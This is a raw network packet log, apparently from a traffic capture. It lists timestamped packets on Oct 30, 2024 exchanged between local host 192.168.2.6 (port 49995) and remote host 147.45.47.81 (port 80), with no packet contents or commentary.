                                                              Oct 30, 2024 15:44:45.941931009 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.942648888 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.942693949 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.942704916 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.942729950 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.942732096 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.942742109 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.942753077 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.942776918 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.942800999 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.942809105 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.942820072 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.942836046 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.942847013 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.942858934 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.942868948 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.942893982 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.943635941 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.943655968 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.943667889 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.943706989 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.943784952 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.943797112 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.943809032 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.943819046 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.943830013 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.943830967 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.943844080 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.943855047 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.943856001 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.943867922 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.943880081 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.943916082 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.944610119 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.944730043 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.944741011 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.944751978 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.944761992 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.944771051 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.944782019 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.944791079 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.944793940 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.944807053 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.944819927 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.944820881 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.944833040 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.944844961 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.944856882 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.944878101 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.945589066 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.945600986 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.945620060 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.945631027 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.945636034 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.945642948 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.945655107 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.945657969 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.945668936 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.945674896 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.945681095 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.945704937 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.946275949 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.946286917 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.946299076 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.946319103 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.946347952 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.946408987 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.946422100 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.946432114 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.946451902 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.946458101 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.946464062 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.946474075 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.946485043 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.946494102 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.946497917 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.946527004 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.946542025 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.957529068 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957540035 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957552910 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957576990 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.957588911 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957601070 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957612038 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957633972 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.957649946 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.957659960 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957672119 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957683086 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957694054 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957709074 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.957731962 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.957736969 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957747936 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957757950 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957781076 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.957782030 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957793951 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957804918 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957818985 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957828999 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.957848072 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.957895041 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957906961 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957916975 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957927942 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957932949 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.957941055 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957953930 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957956076 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.957964897 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957977057 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957981110 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.957989931 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.957999945 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958003044 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958017111 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958040953 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958061934 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958091021 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958101988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958112001 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958123922 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958132982 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958137035 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958149910 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958158016 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958184958 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958237886 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958254099 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958266020 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958280087 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958290100 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958292007 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958303928 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958317041 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958322048 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958328962 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958337069 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958339930 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958355904 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958367109 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958369017 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958379984 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958391905 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958405018 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958408117 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958420038 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958431959 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958432913 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958445072 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958455086 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958456993 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958473921 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958486080 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958498001 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958498001 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958508015 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958519936 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958529949 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958539009 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958542109 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958554029 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958556890 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958566904 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958579063 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958583117 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958595037 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958628893 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958640099 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958667040 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958698988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958710909 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958722115 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958733082 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958734989 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958745003 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958755970 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958797932 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958848953 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958859921 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958865881 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958877087 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958888054 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958899021 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958919048 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958930969 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958930969 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958930969 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.958936930 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958942890 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958950043 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.958976984 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.959013939 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.959024906 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959037066 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959048033 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959058046 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.959059000 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959072113 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959084988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959089994 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.959098101 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959109068 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959119081 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959120035 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.959131956 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959139109 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.959142923 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959155083 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959173918 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959188938 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959188938 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.959188938 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.959199905 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959228039 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.959289074 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.959321976 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959332943 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.959333897 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959346056 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959357023 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959367990 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959373951 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.959379911 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959391117 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959397078 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.959403038 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959408998 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.959414959 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959427118 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959438086 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.959439039 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959476948 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.959875107 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959896088 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959908962 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959937096 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959948063 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959948063 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.959948063 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.959960938 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.959973097 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.960004091 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.960016012 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.960016012 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.960021973 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.960033894 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.960064888 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.960067987 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.960076094 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.960087061 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.960103035 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.960104942 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.960113049 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.960125923 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.960134029 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.960134029 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.960175037 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.961251020 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.961294889 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.961379051 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.961395979 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.961464882 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.961476088 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.961488962 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.961493969 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.961499929 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.961512089 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.961519003 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.961534977 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.961541891 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.961546898 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.961556911 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.961568117 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.961580038 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.961585999 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.961590052 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.961602926 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.961606026 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.961628914 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.961826086 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.962281942 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.962331057 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.962340117 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.962342024 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.962376118 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.962393999 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.962405920 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.962418079 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.962430000 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.962439060 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.962485075 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.962682009 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.963968039 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.963979959 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.963992119 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.964021921 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.964066029 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.964077950 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.964088917 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.964104891 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.964107990 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.964112043 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.964118004 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.964124918 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.964302063 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.964437962 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.964540958 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.964553118 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.964564085 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.964576006 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.964582920 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.964587927 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.964601040 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.964610100 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.964632034 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.965445042 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.965456963 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.965467930 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.965492010 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.965512037 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.965524912 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.965536118 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.965553999 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.965559959 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.965616941 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.967137098 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.967191935 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.967204094 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.967259884 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.967262030 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.967271090 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.967278004 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.967283964 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.967305899 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.967323065 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.967330933 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.967330933 CET8049995147.45.47.81192.168.2.6
